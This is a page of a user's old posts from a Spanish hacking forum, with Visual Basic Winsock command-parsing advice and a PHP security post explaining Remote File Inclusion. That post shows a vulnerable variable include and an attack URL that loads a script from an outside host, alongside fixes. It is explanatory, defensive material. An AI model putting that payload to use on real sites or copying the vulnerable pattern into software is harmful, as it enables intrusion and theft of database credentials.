elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Mensajes
Páginas: 1 [2]
11  Programación / Programación Visual Basic / Re: Enviar un textbox con VB en: 20 Mayo 2005, 18:28 pm
Igual es por lo de If Ubound(separar), no me acuerdo muy bien de como iba eso, prueba con if not ubound(separar), o quítalo....Esque hace mucho que no hago nada en vb, pero eso sirve para que si te mandan un comando "mal construido", osea, que no tenga el separador que tu has asignado pues no entre en el select.
Salu2
12  Programación / Programación Visual Basic / Re: no puedo capturar imagen al windows media player en: 19 Mayo 2005, 21:21 pm
No se puede porque el video está protegido, hay algunos videos que no estan protegidos y se pueden capturar, el moretv por ejemplo si lo pones en modo RGB puedes capturar, pero si esta en modo overlay no va... No creo que haya opción para capturar videos.... hay programas que pueden sacarlos, como el Virtualdub, pero no se como lo harán, desde luego no creo que capturando la pantalla :(.
Salu2
13  Programación / Programación Visual Basic / Re: Enviar un textbox con VB en: 19 Mayo 2005, 21:19 pm
También se puede hacer de esta forma ( es la que uso yo ):
Para enviar cualquier orden primero mandas el comando, separado de lo que varía ( Ej: comando: "CHAT", lo que varía: "hola....")
Y para enviarlo pues unes las dos cadenas con un carácter no muy común o con otra cadena. (ej: WS.sendata "CHAT" & "|||" & variabletexto)
Eso lo haces para todos los comandos, aunque sea por ejemplo abrir el cd y no haya que enviar dato que varíe, pues pones por ej: "ABRIRCD|||OK"
Y luego en el arrival del winsock "partes" la cadena y con un select case vas buscando en función del comando. Ej:
Código:
'dentro del winsock
Dim datos as string
WS.getdata datos
Dim separar as variant
separar=Split(datos, "|||")' crea un array en el que mete los
'datos separados por |||, puede haber todos los comandos
'secundarios que quieras
If ubound(separar) then' si existe algun array....
Select case separar(0) ' aqui estará el comando, ej: "CHAT"
Case "CHAT"
Msgbox separar(1) ' en separar(1) estaría el texto, ej: "Hola"
Case...
Case...
End Select
End if


Espero que te sirva.
Salu2
14  Programación / PHP / Re: Seguridad en PHP en: 25 Abril 2005, 00:35 am
Creo que aquí tampoco sobra hablar sobre el conocido fallo de programación RFI (Remote File Inclusion):
Pongo un ejemplo, una en la que se accede a las secciones con un include (index.php?destino=...):
Código:
<?
include($destino.'.php'); //podría ser también .htm, sin exension...
?>
Con ese código, cualquiera podría ejecutar un script en esa página, solo tendría que poner lo siguiente:
Código:
index.php?destino=Http://web.com/script
(el script tendría que tener, en este caso, extension .php)
Y dependiendo de la seguridad de la web, con el script podría desde ver un listado de los archivos, hasta averiguar los datos para entrar en la base de datos...
Para solucionarlo, hay muchas formas, entre otras, no usar includes con variables o poner en Off la propiedad allow_url_fopen en el archivo php.ini.
Espero que sirva de algo esta aportación :).
Salu2.
Páginas: 1 [2]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines